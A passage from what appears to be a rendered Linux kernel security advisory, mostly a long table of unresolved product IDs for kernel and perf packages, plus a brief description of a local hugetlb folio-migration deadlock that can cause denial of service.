| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in the Linux kernel. A local attacker could exploit a deadlock vulnerability due to incorrect lock ordering between folio_lock and i_mmap_rwsem when migrating hugetlb file-backed folios. This could lead to hung tasks and potential system-wide stalls, resulting in a Denial of Service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
